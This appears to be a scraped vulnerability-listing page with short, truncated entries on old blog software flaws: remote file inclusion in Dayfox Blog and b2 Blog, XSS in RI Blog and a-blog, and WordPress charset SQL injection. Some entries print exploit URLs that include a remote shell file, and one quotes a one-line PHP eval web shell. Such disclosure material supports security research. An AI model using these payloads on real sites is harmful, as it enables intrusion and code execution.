CVE-2007-0150

Multiple PHP remote file inclusion vulnerabilities in index.php in Dayfox Blog allow remote attackers to execute arbitrary PHP code via a URL in the 1 page, 2 subject, and 3 q parameters...

CVE-2007-0150

CVE-2007-0150 affects Dayfox Blog’s index.php, with multiple PHP remote file inclusion vulnerabilities exploitable via user-supplied URL parameters (page, subject, q). The vulnerability stems from unsafely including remote content based on these parameters, allowing an attacker to execute arbitra...

CVE-2007-0121

Cross-site scripting XSS vulnerability in search.asp in RI Blog 1.3 allows remote attackers to inject arbitrary web script or HTML via the q parameter...

CVE-2007-0121

Cross-site scripting XSS vulnerability in search.asp in RI Blog 1.3 allows remote attackers to inject arbitrary web script or HTML via the q parameter...

CVE-2007-0121

CVE-2007-0121 is an XSS vulnerability in RI Blog 1.3 (search.asp) that allows remote attackers to inject arbitrary script/HTML via the q parameter. Public records cite a CVSS v2 base score of 6.8 (Medium), with network attack vector and partial impact to confidentiality, integrity, and availabili...

Dayfox Blog Remote File Include Vuln.

BhhGroup.Org & Bilgi-Yonetimi.Org.Tr script name : Dayfox Blog Script Download : http://hotscripts.com/Detailed/66344.html Risk : High Found By : ShaFuck31 Vulnerable file : index.php Vuln : http://www.victim.com/ScriptPath/index.php?page=sheLL...

WordPress Charset解抹SQL注入漏洞

WordPress是一款流行的网络日记程序。 WordPress处理字符集解码存在问题，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 在当PHP的mbstring扩展激活时，WordPress支持使用不同字符集解码Trackback，因为解码发送在数据库为输入数据执行选择正确的字符集之前，因此允许绕过针对SQL注入的保护。 为了演示需要，Stefan Esser建议使用UTF-7字符集来利用，因为其他的多字节字符集允许多字节序列以''结尾。...

riblog-xss.txt

BhhGroup.Org & Bilgi-Yonetimi.Org.Tr script name : RI Blog 1.3 Script Download : http://www.aspindir.com/indir.asp?id=4098 Risk : High Found By : ShaFuck31 Vulnerable file : search.asp Vulnerable : http://www.victim.com/BlogPath/search.asp?q=XSS ExampLe :...

Easy Blog Doc_Directory远程文件包含漏洞

Easy Blog是一款基于PHP的网络日记程序。 Easy Blog不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于多个脚本对用户提交的'DocDirectory'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 OpenDock Easy Blog 1.4 目前没有详细解决方案提供，请关注以下链接： http://web.opendock.net/index.php/ln/it/idp/40.html...

RI Blog 1.3 XSS Vuln.

BhhGroup.Org & Bilgi-Yonetimi.Org.Tr script name : RI Blog 1.3 Script Download : http://www.aspindir.com/indir.asp?id=4098 Risk : High Found By : ShaFuck31 Vulnerable file : search.asp Vulnerable : http://www.victim.com/BlogPath/search.asp?q=XSS ExampLe :...

RI Blog 1.3 - 'search.asp' Cross-Site Scripting

source: https://www.securityfocus.com/bid/21880/info RI Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user...

CVE-2006-6830

The CVE-2006-6830 entry describes a PHP remote file inclusion in b2 Blog 0.5 and earlier (b2verifauth.php) that lets an attacker execute arbitrary PHP code via the index parameter. Affected software: b2 Blog up to version 0.5 and earlier. Root cause: improper handling of the index URL parameter e...

BO-BLOG vulnerability to submit 1 sentence horse tool[html]-vulnerability warning-the black bar safety net

Belongs to type:Web Apps The following proceduresmethodsmay carry offensive,for security research and teaching purposes. At your own risk! Code ! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" HTMLHEADTITLEThe Csript For The "? php eval$POSTcmd?& gt;" /TITLE META...

CVE-2006-6830

PHP remote file inclusion vulnerability in b2verifauth.php in b2 Blog 0.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the index parameter...

Netease blog the logic of vulnerability--to teach you to make stealth blog-vulnerability warning-the black bar safety net

http://blog.163.com Assume that the user name is abcd Then the blog address is http://blog. 1 6 3. com/abcd According to this rule 而且 知道 网易 博客 登录 页面 为 http://blog.163.com/login.html Because Netease blog can apply to take （.） The user name, 于是我申请了一个login.html username According to the above logic,...

CVE-2006-6729

Cross-site scripting XSS vulnerability in a-blog 1.51 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors...

CVE-2006-6729

Cross-site scripting XSS vulnerability in a-blog 1.51 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors...

[SA23444] a-blog Cross-Site Scripting Vulnerability

TITLE: a-blog Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA23444 VERIFY ADVISORY: http://secunia.com/advisories/23444/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: a-blog 1.x http://secunia.com/product/12949/ DESCRIPTION: Fukumori has reported a...

b2 Blog 0.5 - 'b2verifauth.php' Remote File Inclusion

b2 - 0.5 index Remote File Ýnclude +class : Remote File Include Vulnerability + +Author : mdx +Files : +b2verifauth.php? +code : + + include$index; + + Exploit : ++ + http://www.site./path/b2verifauth.php?index=http://mdxshell.txt? +...

b2 Blog <= 0.5 (b2verifauth.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ================================================================== b2 Blog = 0.5 b2verifauth.php Remote File Include Vulnerability ================================================================== b2 - 0.5 index Remote File ?nclude +class...